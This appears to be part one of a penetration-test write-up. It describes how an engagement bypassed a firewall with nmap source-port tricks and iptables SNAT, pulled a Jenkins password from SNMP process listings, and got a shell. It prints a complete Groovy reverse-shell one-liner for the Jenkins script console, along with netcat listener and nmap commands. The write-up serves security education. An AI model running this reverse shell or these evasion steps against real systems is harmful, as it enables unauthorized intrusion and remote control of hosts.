Why you should always scan UDP ports (1/2)
In this story we’ll see how we exploited snmp vulnerabilities, used a Jenkins console to call a reverse shell, bypassed firewall rules, worked around AppArmor and exploited bash injections to escalate privileges, amongst other things.
This is the story of a pentest in which scanning udp ports allowed us to take control of the whole network. Lets call this company Sales inc. It started like most pentest do, with an enumeration of this company public facing infrastructure. We started by doing the normal OSINT process. I’m not going to get into this, there are great resources on the subject, but you can start looking into these 3 tools
- https://www.maltego.com/
- https://github.com/laramies/theHarvester
- https://github.com/lanmaster53/recon-ng
This phase will allow you to enumerate most of the public information sources. You’ll basically end up with email addresses, domain names, addresses, possible employees, etc… In this specific assessment, social engineering wasn’t in the scope, so we mostly focused on enumerating domains.
Once you have a couple of possible subdomains, you have multiple ways of mapping the public facing infrastructure. The classical way is greatly described in one of Phineas Phisher tutorials (https://www.exploit-db.com/papers/41915). This consists on using reverse whois lookups to find other domains associated to similar parameters as the main domain, such as address or owner. After that you can also use fierce to enumerate adjacent ip spaces. This is useful when targeting a company with big IP ranges assigned.
Say that the company main site is hosted at If they bought a range of public ip addresses, chances are that and also belong to them.
The second and most modern way of doing subdomain enumerations is excelently described here by Patrik Hudak: https://0xpatrik.com/subdomain-enumeration-2019/.
He specializes in subdomain takeover, which is a vulnerability in which you hijack the subdomain of a site mainly due to bad configurations. To exploit this you need to find all the potential subdomains. He uses a more modern approach with tools such as amass (https://github.com/OWASP/Amass), massdns (https://github.com/blechschmidt/massdns), and rapid7 forward dns set (https://opendata.rapid7.com/sonar.fdns_v2/).
One important thing you need to consider: I’d say that 90% of the assignments you’ll get as a pentester have a well defined scope. If you’re lucky to get one that hasn’t (as these are usually more fun), you have to be really careful when mapping the potential scope. This reason for this is you might end up targeting an ip/domain that doesn’t belong to your target. And that's illegal.
Bypassing the firewall
The target company of our pentest was medium sized (think about 10–15 main public facing sites). We ended up with a potential list of about 200 ips/subdomains. Using fierce we were able to find an ip about 6 ip’s away from the main site which looked promising (sticking with the original example, if the main site was located at, this one was The whois showed that it was registered under the same name as the main one (an employee of the company which came up during the OSINT phase).
A quick scan of the site didn’t return any promising leads.

However, there’s a quick trick with nmap you should always remember. Sometimes, network administrators will allow bi-directional port-based filtering when only egress filtering should by allowed. Whenever you need to bypass network rules, you should try using commonly allowed ports such as 22,53,80 and 443. This is what we did with nmap’s source port option.

If you wanted to see this at low level, you wouldn’t be able to find it with
netstat -an
Since by default nmap uses syn scan with raw sockets. Which means the connection never gets fully established. Buy you will be able to see it with tcpdump. You can set up a listener with
nc -lkvp 5555
We’ll perform a local scan with
nmap --source-port 53 -p 5555 localhost
And intercept the traffic with
tcpdump -i lo -nn 'port 5555'

You can read more about firewall bypasses here: https://nmap.org/book/firewall-subversion.htm
We proceeded to setting up iptables to source nat the port. You can do this with this rule:
iptables -t nat -A POSTROUTING -d -p tcp -j SNAT --to :53
This will source port nat any traffic sent to, changing the src ip port to 53.
If you still have any doubts, here’s an excellent resource on source NAT: https://gist.github.com/DavidWittman/3805130
Getting a foothold
After setting up the port forwarding, browsing the site under port 8080 showed us something similar to this:

Jenkins is a Java open source tool for automated CI/CD pipelines (amongst other things). The version we found didn’t have any published vulnerabilities, so we had to take another route. Here comes the reason for this article’s title.
Lets talk for a minute about snmp. For those who haven’t work with it before, Simple Network Management Protocol (https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol) is an application layer protocol which allows you to monitor and manage network equipment. Since it uses udp, it can be overlooked in scans. Properly enumerating this port can give you access to a lot of sensitive information in which you can find network interfaces info, netstat info and processes info. SNMP v1 and v2c use an authentication scheme which relies on a secret string called a community string which allows access to the device. There’s a default community string for all devices called “public”. This string wont usually allow you to modify anything (its read-only) but will allow enumeration of the device. SNMP v3 uses username/password authentication, paired with an encryption key.

There are multiple tools available to exploit snmp (https://blog.pentesteracademy.com/snmp-exploitation-with-metasploit-and-snmpset-920de3fc2c50) but we chose nmap and snmpwalk. You can see nmap’s available snmp plugins in the next picture:

We struck gold with the snmp-processes.nse script, which showed the following output.

Its always recommended not to start processes with passwords in the command line. This is because they can be obtained by ways of
- external process enumeration (in this example by snmp)
- bash_history logs
- internal process enumeration by ps (which can be performed by other users, and not only the one running the command)
There are certain tools which obfuscate passwords by default, like ssh-pass, but most dont:

Even if the process only shows up for a second, you can still log all executions by scanning procfs. An excelent tool that does this by setting up inotify watchers on these fs is pspy (https://github.com/DominicBreuker/pspy)
Lets continue with the pentest. After getting the jenkins password from the process snmp enumeration, we were able to access it. If you’re lucky, the scripting console will be enabled, and will allow you to call a reverse shell from the machine.

You can call the reverse shell with the following code (change /bin/bash with cmd.exe if it’s being hosted on windows), taken from https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76:
String host="localhost";
int port=8044;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
After running it, you’ll get something like this on your listener:

I’m going to wrap up this story here. In part 2 will cover how we escalated privileges combining two different vulnerabilities to inject code in bash scripts and bypass AppArmor. After that we exploited a vulnerable sudo command. I’ll also detail how we compromised the rest of the hosts in the new VLAN in which the jenkins host was located.